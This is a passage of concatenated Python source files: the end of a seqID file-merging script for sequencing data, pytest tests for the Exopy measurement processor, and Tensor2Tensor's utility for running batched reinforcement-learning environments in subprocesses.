start > maxtime + number: # Set the max time for each iteration maxtime = currenttime - start # Print up to 80 dots on a line, with a one second delay between each dot if self.count <= 80: sys.stdout.write('.') sys.stdout.flush() self.count += 1 # Once there are 80 dots on a line, start a new line with the the time else: sys.stdout.write('\n.') sys.stdout.flush() self.count = 1 # Close the output file writeout.close() if outfile else "" def __init__(self, args, start): """ :param args: list of arguments passed to the script :param start: the start time Initialises the variables required for this class """ from queue import Queue import multiprocessing # Define variables from the arguments - there may be a more streamlined way to do this self.args = args self.path = os.path.join(args['path'], "") self.start = start # Determine which seq ID file to use # If an argument for the file is provided, use it if args['f']: self.idfile = args['f'] # If there is no path information present in the argument, use :path + the file name if '/' not in self.idfile: self.idfile = '{}{}'.format(self.path, self.idfile) assert os.path.isfile(self.idfile), 'Could not find the seq ID file. Please double check the supplied' \ 'arguments' # If no argument is provided, try to find the file else: # Look for .txt, .tsv, or .csv files self.idfile = map(lambda x: glob('{}*{}'.format(self.path, x)), ['.txt', '.csv', '.tsv']) # Initialise the file count filecount = 0 # Iterate through each extension for extension in self.idfile: if extension: # If a single file with that extension was found, set :self.idfile to that file extensiontype = extension[0].split('.')[1] assert len(extension) == 1, u'Too many .{} entries found for the ID file.'.format(extensiontype) self.idfile = extension[0] # Increment the count filecount += 1 # Assertions to exit if there are too many or too few potential seq ID files assert filecount <= 1, u'Too many potential ID files found. Please check that there is only one .txt,' \ u' .tsv, or .csv file in the path' assert filecount >= 1, u'Could not find a seq ID file with a .txt, .tsv, or .csv extension in the path' # Assertion to ensure that the seq ID file exists assert os.path.isfile(self.idfile), u'seqID file cannot be found {0!r:s}'.format(self.idfile) printtime(u'Using {} as the file containing seq IDs to be merged'.format(self.idfile), self.start) # Set the delimiter self.delimiter = args['d'].lower() if self.delimiter == 'space': self.delimiter = ' ' elif self.delimiter == 'tab': self.delimiter = '\t' elif self.delimiter == 'comma' or self.delimiter == ',': self.delimiter = ',' # Determine if sorting the columns is desired self.sort = args['Sort'] # Initialise class variables self.seqids = "" self.seqfiles = list() self.data = list() self.cpus = multiprocessing.cpu_count() self.mergequeue = Queue(maxsize=self.cpus) self.count = 0 self.metadata = list() # Find which IDs need to be merged together from the text file self.idseek() # Find the files corresponding to the IDs self.idfind() # Merge the files together self.idmerge() # Exit printtime(u'Files have been successfully merged.', self.start) # Set the optional arguments self.copy = args['copy'] if args['copy'] else False self.relativepaths = args['relativePaths'] if args['relativePaths'] else False # Optionally run the file linking method if args['linkFiles'] or args['copy']: # Create the assembly folder and path from the supplied arguments self.assemblyfolder = args['o'] if args['o'] else self.path.split('/')[-2] self.assemblypath = os.path.join(args['a'], "") + self.assemblyfolder make_path(self.assemblypath) assert os.path.isdir(self.assemblypath), 'Could not create the destination folder. Please double-check ' \ 'your supplied arguments' self.samplesheet = args['samplesheet'] # Run the linking self.filelink() printtime(u'Files have been successfully linked to the assembly folder. Analysis complete.', self.start) sys.exit() # If the script is called from the command line, then call the argument parser if __name__ == '__main__': from time import time from argparse import ArgumentParser import subprocess # Extract the path of the current script from the full path + file name homepath = os.path.split(os.path.abspath(__file__))[0] # Find the commit of the script by running a command to change to the directory containing the script and run # a git command to return the short version of the commit hash commit = subprocess.Popen('cd {} && git rev-parse --short HEAD'.format(homepath), shell=True, stdout=subprocess.PIPE).communicate()[0].rstrip() # Parser for arguments parser = ArgumentParser(description='Merges seqIDs') parser.add_argument('-v', '--version', action='version', version='%(prog)s commit {}'.format(commit)) parser.add_argument('path', help='Specify path') parser.add_argument('-f', metavar='idFile', help='The name and path of the file containing seqIDs to merge and reassemble. If this file is' ' in the path, then including the path is not necessary for this argument. Alternatively,' ' as long as the file has a .txt, .csv, or. tsv file extension, you can omit this argument' ' altogether. Note: if you don\'t supply the argument, and there are multiple files with ' 'any of these extensions, the program will fail') parser.add_argument('-d', metavar='delimiter', default='space', help='The delimiter used to separate seqIDs. Popular options are "space", "tab", and "comma". ' 'Default is space. Note: you can use custom delimiters. Just be aware that a delimiter, ' 'such as "-" will break the program if there are hyphens in your sample names') parser.add_argument('-S', '--Sort', default=False, action='store_true', help='Optionally sort the seqIDs to merge. seqIDs will be sorted by year, then ID.') parser.add_argument('-l', '--linkFiles', action='store_true', help='Optionally link the files to the \'WGS_Spades\' directory. Note that this is specific to' ' the local setup here and is not recommended unless your set-up is similar') parser.add_argument('-r', '--relativePaths', action='store_true', help='Optionally use relative paths instead of absolute paths when linking the files. ' 'The pipeline does not work with relative paths yet') parser.add_argument('-a', metavar='assemblyLocation', default='/nas/akoziol/WGS_Spades/', help='Path to a folder where files are automatically assembled using a cluster. Only relevant ' 'if linking the files') parser.add_argument('-o', metavar='outputdirectory', help='A directory name to use when linking the merged .fastq files to the WGS_Spades folder ' 'e.g. 2016-01-19_ListeriaMerged. If this is not provided, then the program will use the ' 'name of lowest folder in the path e.g. \'files\' will be used if the path ' 'is \'/path/to/files\'') parser.add_argument('-s', '--samplesheet', action='store_true', help='Depending on the version of the assembly pipeline, a sample sheet is required. ' 'Including this option will populate a basic sample sheet with enough information in order' ' to allow the pipeline to proceed') parser.add_argument('-c', '--copy', action='store_true', help='Copies rather than symbolically linking the files to the destination folder') # Get the arguments into a list arguments = vars(parser.parse_args()) # Get the starting time for use in print statements starttime = time() # Run the pipeline output = Merger(arguments, starttime)
test_processor.py
# -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # Copyright 2015-2018 by Exopy Authors, see AUTHORS for more details. # # Distributed under the terms of the BSD license. # # The full license is in the file LICENCE, distributed with this software. # ----------------------------------------------------------------------------- """Test the working of the measurement processor. """ import enaml import pytest from threading import Thread from exopy.measurement.measurement import Measurement from exopy.tasks.api import RootTask from exopy.testing.util import ErrorDialogException with enaml.imports(): from enaml.workbench.ui.ui_manifest import UIManifest from exopy.tasks.manifest import TasksManagerManifest from exopy.testing.measurement.contributions import Flags @pytest.fixture def measurement_with_tools(measurement, tmpdir): """Create a measurement with all dummy tools attached. """ measurement.add_tool('pre-hook', 'dummy') measurement.add_tool('post-hook', 'dummy') measurement.add_tool('monitor', 'dummy') measurement.root_task.default_path = str(tmpdir) return measurement @pytest.fixture def processor(exopy_qtbot, measurement_workbench, measurement): """Fixture starting the measurement plugin and returning the processor. Use app because we need run the event loop """ # measurement ensures that contributions are there measurement_workbench.register(UIManifest()) measurement_workbench.register(TasksManagerManifest()) plugin = measurement_workbench.get_plugin('exopy.measurement') plugin.selected_engine = 'dummy' return plugin.processor def process_and_join_thread(bot, thread, timeout=0.1): """Process application events and join a thread. """ def test_func(): thread.join(timeout) assert not thread.is_alive() bot.wait_until(test_func, timeout=20e3) def test_setting_continuous_processing(processor): """Test that the post-setter does update the flag. """ processor.continuous_processing = False assert not processor._state.test('continuous_processing') processor.continuous_processing = True assert processor._state.test('continuous_processing') @pytest.mark.timeout(10) def test_starting_measurement_no_measurement_enqueued(exopy_qtbot, processor): """Test starting next measurement in the queue when no measurements are enqueued. """ processor.start_measurement(None) process_and_join_thread(exopy_qtbot, processor._thread) def assert_inactive(): assert not processor.active exopy_qtbot.wait_until(assert_inactive) def test_starting_measurement_thread_not_dying(exopy_qtbot, processor, measurement): """Test starting but failing to stop the backgground thread. """ class FalseThread(object): def __init__(self, processor): self.state = processor._state def is_alive(self): return True def join(self, timeout): if not self.state.test('stop_processing'): raise Exception() processor._thread = FalseThread(processor) core = processor.plugin.workbench.get_plugin('enaml.workbench.core') core.invoke_command('exopy.app.errors.enter_error_gathering') processor.start_measurement(None) exopy_qtbot.wait(100) with pytest.raises(ErrorDialogException): core.invoke_command('exopy.app.errors.exit_error_gathering') @pytest.mark.timeout(60) def test_running_full_measurement(exopy_qtbot, processor, measurement_with_tools, dialog_sleep, tmpdir): """Test running a complete measurement with pre/post-hooks and monitor. """ plugin = processor.plugin.workbench.get_plugin('exopy.measurement') measure2 = Measurement(plugin=plugin, root_task=RootTask(), name='Dummy', id='002') processor.plugin.enqueued_measurements.add(measure2) measurement = measurement_with_tools processor.continuous_processing = False processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) assert measurement is processor.running_measurement assert measurement.status == 'RUNNING' assert tmpdir.listdir() pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) assert processor.monitors_window assert processor.monitors_window.measurement is measurement assert measurement.monitors['dummy'].running exopy_qtbot.wait(dialog_sleep) processor.engine.go_on.set() post_hook = measurement.post_hooks['dummy'] exopy_qtbot.wait_until(lambda: post_hook.waiting.wait(0.04), timeout=40e3) assert measurement.task_execution_result assert not measurement.monitors['dummy'].running assert measurement.monitors['dummy'].received_news post_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement.status == 'COMPLETED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected assert measure2.status == 'READY' @pytest.mark.timeout(60) def test_running_measurement_whose_runtime_are_unavailable( processor, monkeypatch, measurement_with_tools, exopy_qtbot): """Test running whose runtime dependencies are unavailable. """ monkeypatch.setattr(Flags, 'RUNTIME2_UNAVAILABLE', True) processor.start_measurement(measurement_with_tools) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) process_and_join_thread(exopy_qtbot, processor._thread) assert measurement_with_tools.status == 'SKIPPED' @pytest.mark.timeout(60) def test_running_measurement_failing_checks(exopy_qtbot, processor, measurement_with_tools): """Test running a measurement failing to pass the tests. """ measurement_with_tools.pre_hooks['dummy'].fail_check = True processor.start_measurement(measurement_with_tools) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) process_and_join_thread(exopy_qtbot, processor._thread) assert measurement_with_tools.status == 'FAILED' assert 'checks' in measurement_with_tools.infos m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected @pytest.mark.timeout(60) def test_running_measurement_failing_pre_hooks(exopy_qtbot, processor, measurement_with_tools): """Test running a measurement whose pre-hooks fail to execute. """ measurement_with_tools.pre_hooks['dummy'].fail_run = True processor.start_measurement(measurement_with_tools) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement_with_tools.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) exopy_qtbot.wait(10) pre_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement_with_tools.status == 'FAILED' assert 'pre-execution' in measurement_with_tools.infos m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected @pytest.mark.timeout(60) def test_running_measurement_failing_main_task(exopy_qtbot, processor, measurement_with_tools): """Test running a measurement whose pre-hooks fail to execute. """ measurement = measurement_with_tools processor.engine = processor.plugin.create('engine', 'dummy') processor.engine.fail_perform = True processor.start_measurement(measurement_with_tools) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) exopy_qtbot.wait(10) pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) processor.engine.go_on.set() post_hook = measurement.post_hooks['dummy'] exopy_qtbot.wait_until(lambda: post_hook.waiting.wait(0.04), timeout=40e3) post_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement.status == 'FAILED' assert 'main task' in measurement_with_tools.infos m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected @pytest.mark.timeout(60) def test_running_measurement_failing_post_hooks(exopy_qtbot, processor, measurement_with_tools): """Test running a measurement whose post-hooks fail to execute. """ measurement = measurement_with_tools measurement_with_tools.post_hooks['dummy'].fail_run = True processor.start_measurement(measurement_with_tools) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) processor.engine.go_on.set() post_hook = measurement.post_hooks['dummy'] exopy_qtbot.wait_until(lambda: post_hook.waiting.wait(0.04), timeout=40e3) post_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement_with_tools.status == 'FAILED' assert 'post-execution' in measurement_with_tools.infos m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected @pytest.mark.timeout(60) def test_running_forced_enqueued_measurement(exopy_qtbot, processor, measurement_with_tools): """Test running a measurement about which we know that checks are failing. """ measurement = measurement_with_tools measurement.forced_enqueued = True measurement.pre_hooks['dummy'].fail_check = True processor.start_measurement(measurement_with_tools) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) assert processor.engine.measurement_force_enqueued processor.engine.go_on.set() post_hook = measurement.post_hooks['dummy'] exopy_qtbot.wait_until(lambda: post_hook.waiting.wait(0.04), timeout=40e3) post_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) @pytest.mark.parametrize('mode', ['between hooks', 'after hooks']) @pytest.mark.timeout(60) def test_stopping_measurement_while_preprocessing(exopy_qtbot, mode, processor, measurement_with_tools): """Test asking the processor to stop while is is running the pre-hooks. The post-hooks should not be run. """ measurement = measurement_with_tools if mode == 'between hooks': # Will see the difference only in coverage measurement.move_tool('pre-hook', 0, 1) processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) processor.stop_measurement(no_post_exec=True) assert pre_hook.stop_called pre_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement.status == 'INTERRUPTED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected @pytest.mark.timeout(60) def test_stopping_measurement_while_running_main(exopy_qtbot, processor, measurement_with_tools): """Test asking the processor to stop while is is running the main task. The post-hooks should be run. """ measurement = measurement_with_tools processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) processor.stop_measurement() processor.engine.go_on.set() post_hook = measurement.post_hooks['dummy'] exopy_qtbot.wait_until(lambda: post_hook.waiting.wait(0.04), timeout=40e3) post_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement.status == 'INTERRUPTED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected @pytest.mark.timeout(60) def test_stopping_measurement_while_postprocessing(exopy_qtbot, processor, measurement_with_tools): """Test asking the processor to stop while is is running the post hooks. """ measurement = measurement_with_tools measurement.add_tool('post-hook', 'dummy2') measurement.post_hooks['dummy2'].fail_run = True processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) processor.engine.go_on.set() post_hook = measurement.post_hooks['dummy'] exopy_qtbot.wait_until(lambda: post_hook.waiting.wait(0.04), timeout=40e3) processor.stop_measurement(force=True) assert post_hook.stop_called post_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement.status == 'INTERRUPTED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected @pytest.mark.timeout(60) def test_stopping_processing(exopy_qtbot, processor, measurement_with_tools): """Test stopping processing while running the main task.. """ plugin = processor.plugin.workbench.get_plugin('exopy.measurement') measure2 = Measurement(plugin=plugin, root_task=RootTask(), name='Dummy', id='002') processor.plugin.enqueued_measurements.add(measure2) measurement = measurement_with_tools processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) processor.stop_processing(no_post_exec=True) processor.engine.go_on.set() def wait(timeout): processor._thread.join(timeout) assert not processor._thread.is_alive() exopy_qtbot.wait_until(lambda: wait(0.04), timeout=40e3) assert measurement.status == 'INTERRUPTED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected assert measure2.status == 'READY' @pytest.mark.timeout(60) def test_stopping_processing_in_hook(exopy_qtbot, processor, measurement_with_tools): """Test stopping processing while running a hook. """ plugin = processor.plugin.workbench.get_plugin('exopy.measurement') measure2 = Measurement(plugin=plugin, root_task=RootTask(), name='Dummy', id='002') processor.plugin.enqueued_measurements.add(measure2) measurement = measurement_with_tools processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) processor.stop_processing(no_post_exec=True) pre_hook.go_on.set() def wait(timeout): processor._thread.join(timeout) assert not processor._thread.is_alive() exopy_qtbot.wait_until(lambda: wait(0.04), timeout=40e3) assert measurement.status == 'INTERRUPTED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected assert measure2.status == 'READY' @pytest.mark.timeout(240) def test_stopping_processing_while_in_pause(exopy_qtbot, processor, measurement_with_tools): """Test stopping processing while in pause before starting main. """ plugin = processor.plugin.workbench.get_plugin('exopy.measurement') measure2 = Measurement(plugin=plugin, root_task=RootTask(), name='Dummy', id='002') processor.plugin.enqueued_measurements.add(measure2) def wait_on_state_paused(timeout): assert processor._state.wait(timeout, 'paused') measurement = measurement_with_tools processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) processor.pause_measurement() pre_hook.accept_pause = False pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: wait_on_state_paused(0.04), timeout=40e3) processor.stop_processing(no_post_exec=True) exopy_qtbot.wait(0.2) def wait(timeout): processor._thread.join(timeout) assert not processor._thread.is_alive() exopy_qtbot.wait_until(lambda: wait(0.04), timeout=40e3) assert measurement.status == 'INTERRUPTED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected assert measure2.status == 'READY' @pytest.mark.timeout(480) def test_pausing_measurement(exopy_qtbot, processor, measurement_with_tools): """Test running a complete measurement with pre/post-hooks and monitor. """ measurement = measurement_with_tools measurement.add_tool('pre-hook', 'dummy2') measurement.move_tool('pre-hook', 2, 0) measurement.add_tool('post-hook', 'dummy2') processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) def wait_on_state_paused(timeout): assert processor._state.wait(timeout, 'paused') pre_hook = measurement.pre_hooks['dummy2'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) # Pause inside a pre_hook. processor.pause_measurement() exopy_qtbot.wait_until(lambda: measurement.status == 'PAUSING') pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: wait_on_state_paused(0.04), timeout=40e3) assert measurement.status == 'PAUSED' processor.resume_measurement() exopy_qtbot.wait_until(lambda: pre_hook.signal_resuming.wait(0.04), timeout=40e3) assert measurement.status == 'RESUMING' pre_hook.go_on_resuming.set() exopy_qtbot.wait_until(lambda: pre_hook.signal_resumed.wait(0.04), timeout=40e3) assert measurement.status == 'RUNNING' # Pause in between two pre_hooks processor.pause_measurement() pre_hook.go_on_resumed.set() exopy_qtbot.wait_until(lambda: wait_on_state_paused(0.04), timeout=40e3) assert measurement.status == 'PAUSED' processor.resume_measurement() # Pause just before starting the main measurement. pre_hook2 = measurement.pre_hooks['dummy'] pre_hook2.accept_pause = False exopy_qtbot.wait_until(lambda: pre_hook2.waiting.wait(0.04), timeout=40e3) assert measurement.status == 'RUNNING' processor.pause_measurement() pre_hook2.go_on.set() exopy_qtbot.wait_until(lambda: wait_on_state_paused(0.04), timeout=40e3) processor.resume_measurement() # Pause during the main task execution. exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) processor.pause_measurement() processor.engine.go_on.set() exopy_qtbot.wait_until(lambda: wait_on_state_paused(0.04), timeout=40e3) assert measurement.status == 'PAUSED' processor.resume_measurement() exopy_qtbot.wait_until(lambda: processor.engine.signal_resuming.wait(0.04), timeout=40e3) assert measurement.status == 'RESUMING' processor.engine.go_on_resuming.set() exopy_qtbot.wait_until(lambda: processor.engine.signal_resumed.wait(0.04), timeout=40e3) assert measurement.status == 'RUNNING' processor.engine.go_on_resumed.set() # Pause inside a post_hook. post_hook = measurement.post_hooks['dummy'] exopy_qtbot.wait_until(lambda: post_hook.waiting.wait(0.04), timeout=40e3) processor.pause_measurement() exopy_qtbot.wait_until(lambda: measurement.status == 'PAUSING') post_hook.go_on.set() exopy_qtbot.wait_until(lambda: wait_on_state_paused(0.04), timeout=40e3) assert measurement.status == 'PAUSED' processor.resume_measurement() exopy_qtbot.wait_until(lambda: post_hook.signal_resuming.wait(0.04), timeout=40e3) assert measurement.status == 'RESUMING' post_hook.go_on_resuming.set() exopy_qtbot.wait_until(lambda: post_hook.signal_resumed.wait(0.04), timeout=40e3) assert measurement.status == 'RUNNING' # Pause in between two post_hooks processor.pause_measurement() post_hook.go_on_resumed.set() exopy_qtbot.wait_until(lambda: wait_on_state_paused(0.04), timeout=40e3) assert measurement.status == 'PAUSED' processor.resume_measurement() post_hook2 = measurement.post_hooks['dummy2'] exopy_qtbot.wait_until(lambda: post_hook2.waiting.wait(0.04), timeout=40e3) post_hook2.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement.status == 'COMPLETED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected def test_monitor_creation(processor, measurement, exopy_qtbot, dialog_sleep): """Test all possible possibilities when creating a monitor dock item. """ def run(exopy_qtbot, measurement): t = Thread(target=processor._start_monitors, args=(measurement,)) t.start() exopy_qtbot.wait_until(lambda: not t.is_alive(), timeout=10e3) exopy_qtbot.wait(dialog_sleep) processor.engine = processor.plugin.create('engine', 'dummy') measurement.add_tool('monitor', 'dummy') run(exopy_qtbot, measurement) assert len(processor.monitors_window.dock_area.dock_items()) == 1 measurement.add_tool('monitor', 'dummy2') run(exopy_qtbot, measurement) assert len(processor.monitors_window.dock_area.dock_items()) == 2 measurement.remove_tool('monitor', 'dummy2') run(exopy_qtbot, measurement) assert len(processor.monitors_window.dock_area.dock_items()) == 1 measurement.add_tool('monitor', 'dummy3') run(exopy_qtbot, measurement) assert len(processor.monitors_window.dock_area.dock_items()) == 2 measurement.add_tool('monitor', 'dummy4') run(exopy_qtbot, measurement) assert len(processor.monitors_window.dock_area.dock_items()) == 2 processor.plugin.stop() assert not processor.monitors_window
batch_env_factory.py
# coding=utf-8 # Copyright 2018 The Tensor2Tensor Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utilities for creating batched environments.""" # The code was based on Danijar Hafner's code from tf.agents: # https://github.com/tensorflow/agents/blob/master/agents/tools/wrappers.py # https://github.com/tensorflow/agents/blob/master/agents/scripts/utility.py from __future__ import absolute_import from __future__ import division from __future__ import print_function import atexit import multiprocessing import os import random import signal import subprocess import sys import traceback from tensor2tensor.rl.envs import batch_env from tensor2tensor.rl.envs import py_func_batch_env from tensor2tensor.rl.envs import simulated_batch_env import tensorflow as tf def batch_env_factory(hparams, xvfb=False): """Factory of batch envs.""" environment_spec = hparams.environment_spec if environment_spec.simulated_env: # TODO(piotrmilos): Consider passing only relevant parameters cur_batch_env = _define_simulated_batch_env( environment_spec, hparams.num_agents) else: cur_batch_env = _define_batch_env(hparams.environment_spec, hparams.num_agents, xvfb=xvfb) return cur_batch_env def _define_batch_env(environment_spec, num_agents, xvfb=False): """Create environments and apply all desired wrappers.""" with tf.variable_scope("environments"): envs = [ ExternalProcessEnv(environment_spec.env_lambda, xvfb) for _ in range(num_agents)] env = batch_env.BatchEnv(envs, blocking=False) env = py_func_batch_env.PyFuncBatchEnv(env) return env def _define_simulated_batch_env(environment_spec, num_agents): cur_batch_env = simulated_batch_env.SimulatedBatchEnv(environment_spec, num_agents) return cur_batch_env class ExternalProcessEnv(object): """Step environment in a separate process for lock free parallelism.""" # Message types for communication via the pipe. _ACCESS = 1 _CALL = 2 _RESULT = 3 _EXCEPTION = 4 _CLOSE = 5 def __init__(self, constructor, xvfb): """Step environment in a separate process for lock free parallelism. The environment will be created in the external process by calling the specified callable. This can be an environment class, or a function creating the environment and potentially wrapping it. The returned environment should not access global variables. Args: constructor: Callable that creates and returns an OpenAI gym environment. xvfb: Frame buffer. Attributes: observation_space: The cached observation space of the environment. action_space: The cached action space of the environment. """ self._conn, conn = multiprocessing.Pipe() if xvfb: server_id = random.randint(10000, 99999) auth_file_id = random.randint(10000, 99999999999) xauthority_path = "/tmp/Xauthority_{}".format(auth_file_id) command = "Xvfb :{} -screen 0 1400x900x24 -nolisten tcp -auth {}".format( server_id, xauthority_path) with open(os.devnull, "w") as devnull: proc = subprocess.Popen(command.split(), shell=False, stdout=devnull, stderr=devnull) atexit.register(lambda: os.kill(proc.pid, signal.SIGKILL)) def constructor_using_xvfb(): os.environ["DISPLAY"] = ":{}".format(server_id) os.environ["XAUTHORITY"] = xauthority_path return constructor() self._process = multiprocessing.Process( target=self._worker, args=(constructor_using_xvfb, conn)) else: self._process = multiprocessing.Process( target=self._worker, args=(constructor, conn)) atexit.register(self.close) self._process.start() self._observ_space = None self._action_space = None @property def observation_space(self): if not self._observ_space: self._observ_space = self.__getattr__("observation_space") return self._observ_space @property def action_space(self): if not self._action_space: self._action_space = self.__getattr__("action_space") return self._action_space def __getattr__(self, name): """Request an attribute from the environment. Note that this involves communication with the external process, so it can be slow. Args: name: Attribute to access. Returns: Value of the attribute. """ self._conn.send((self._ACCESS, name)) return self._receive() def call(self, name, *args, **kwargs): """Asynchronously call a method of the external environment. Args: name: Name of the method to call. *args: Positional arguments to forward to the method. **kwargs: Keyword arguments to forward to the method. Returns: Promise object that blocks and provides the return value when called. """ payload = name, args, kwargs self._conn.send((self._CALL, payload)) return self._receive def close(self): """Send a close message to the external process and join it.""" try: self._conn.send((self._CLOSE, None)) self._conn.close() except IOError: # The connection was already closed. pass self._process.join() def step(self, action, blocking=True): """Step the environment. Args: action: The action to apply to the environment. blocking: Whether to wait for the result. Returns: Transition tuple when blocking, otherwise callable that returns the transition tuple. """ promise = self.call("step", action) if blocking: return promise() return promise def reset(self, blocking=True): """Reset the environment. Args: blocking: Whether to wait for the result. Returns: New observation when blocking, otherwise callable that returns the new observation. """ promise = self.call("reset") if blocking: return promise() return promise def _receive(self): """Wait for a message from the worker process and return its payload. Raises: Exception: An exception was raised inside the worker process. KeyError: The received message is of an unknown type. Returns: Payload object of the message. """ message, payload = self._conn.recv() # Re-raise exceptions in the main process. if message == self._EXCEPTION: stacktrace = payload raise Exception(stacktrace) if message == self._RESULT: return payload raise KeyError("Received message of unexpected type {}".format(message)) def _worker(self, constructor, conn): """The process waits for actions and sends back environment results. Args: constructor: Constructor for the OpenAI Gym environment. conn: Connection for communication to the main process. """ try: env = constructor() while True: try: # Only block for short times to have keyboard exceptions be raised. if not conn.poll(0.1): continue message, payload = conn.recv() except (EOFError, KeyboardInterrupt): break if message == self._ACCESS: name = payload result = getattr(env, name) conn.send((self._RESULT, result)) continue if message == self._CALL: name, args, kwargs = payload result = getattr(env, name)(*args, **kwargs) conn.send((self._RESULT, result)) continue if message == self._CLOSE: assert payload is None env.close() break raise KeyError("Received message of unknown type {}".format(message)) except Exception: # pylint: disable=broad-except stacktrace = "".join(traceback.format_exception(*sys.exc_info())) # pylint: disable=no-value-for-parameter tf.logging.error("Error in environment process: {}".format(stacktrace)) conn.send((self._EXCEPTION, stacktrace)) conn.close()
test_complete.py
